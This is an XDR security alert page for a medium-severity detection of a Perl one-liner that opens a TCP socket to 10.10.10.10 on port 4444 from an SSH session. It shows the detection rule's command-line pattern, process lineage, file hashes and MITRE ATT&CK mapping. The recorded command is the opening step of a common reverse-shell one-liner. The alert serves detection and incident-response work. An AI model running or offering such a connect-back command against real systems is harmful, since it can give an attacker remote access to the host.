MEDIUM Perl script connecting to network

Detected ID: #37775 | Detected: 2026-01-17 06:20:32 | Execution
View Incident Back
Alert Overview

Process action type = execution AND target process cmd = *socket*connect*sock_stream*, *socket*sock_stream*connect* AND target process name = perl

Unclassified
XDR BIOC
New
DS:PANW/XDR Agent DOM:Security
Host Information
inbridge-42
172.30.1.22
inbridge-42\dsst
f9f236c251cd4f1ab8660a81e41c7cc7
-
Process Information Process Execution
Actor Process (Executor)
Process Name timeout
Path /usr/bin/timeout
PID 553284
SHA256 375eaa8774baf7667515932c4d6fa2e31a2c21e9c50f152a27c4c6a718374ebe VT
MD5 f919282d021cba6698eb6d7ecca48449 
timeout 2 perl -e use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(4444,inet_aton("10.10.10.10")));
Action Process (Target)
Process Name perl
SHA256 38d70f54fd18d614e9e6cc35c960b45f54e7b991894b8308e704ae9953c86ce4 VT 
perl -e use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(4444,inet_aton("10.10.10.10")));
Parent Process (Causality)
Process Name sshd
Path /usr/sbin/sshd
SHA256 4cc983fa8f3a26626981dbbe79113348fb86cca3ec426f6af5fabd08215fd5e1 VT
MD5 6abd5bb3990d37d6ad2027f5a155af22 
sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
MITRE ATT&CK Mapping
TA0002 - Execution
T1059.004 - Command and Scripting Interpreter: Unix Shell
Quick Actions
View Related Incident View Endpoint Check Hash on VirusTotal Back to Alerts
Severity Analysis
MEDIUM

Review and assess impact

Summary
Events 1
IP Addresses 1
Tags 2
File Artifacts Yes
Network Artifacts No
Registry Artifacts No
Analyst Verdict